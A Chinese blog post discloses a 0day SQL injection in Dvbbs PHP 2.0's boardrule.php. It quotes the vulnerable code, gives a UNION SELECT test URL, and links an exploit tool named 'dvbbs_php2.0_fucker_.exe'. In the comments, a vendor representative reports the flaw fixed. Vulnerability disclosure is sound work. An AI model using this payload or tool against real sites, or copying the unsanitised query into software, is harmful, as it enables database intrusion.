dvbbs之PHP版本0day

————————————-
注:本站首发,转载请保留,谢谢!
http://www.huaidan.org
鬼仔's Blog
————————————-
影响版本:2.0
漏洞文件:/boardrule.php
Author:sniperhg 小蟑螂
信息来源:零客网安 www.0kee.com

Dvbbs PHP 0day

相关代码:

function brule() {
  global $dv,$db,$boardid,$lang,$groupboardid;
  $groupboardid=$_GET['groupboardid'];
  if(!empty($_GET['groupboardid'])){
    $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");  
  }
  else{
    $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");  
  }

直接获得变量groupboardid,不为空就直接带入查询导致注入。

测试:http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*

利用工具 dvbbs_php2.0_fucker_.exe MD5 : 6b931f8e00e90cf4b1faa531a59d4b36
dvbbs_php2.0_fucker_.rar

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

  • 小蟑螂

    能问下您在哪拣的吗?
    w w w.0kee. c o m / read.php?tid=239

  • 鬼仔

    我在坛子里回了。不过我不能说的,不好意思啊。

  • gekie

    已经修复。

    感谢您对动网的支持和关注

  • 鬼仔

    @gekie 修复了就好了。 :)

发表评论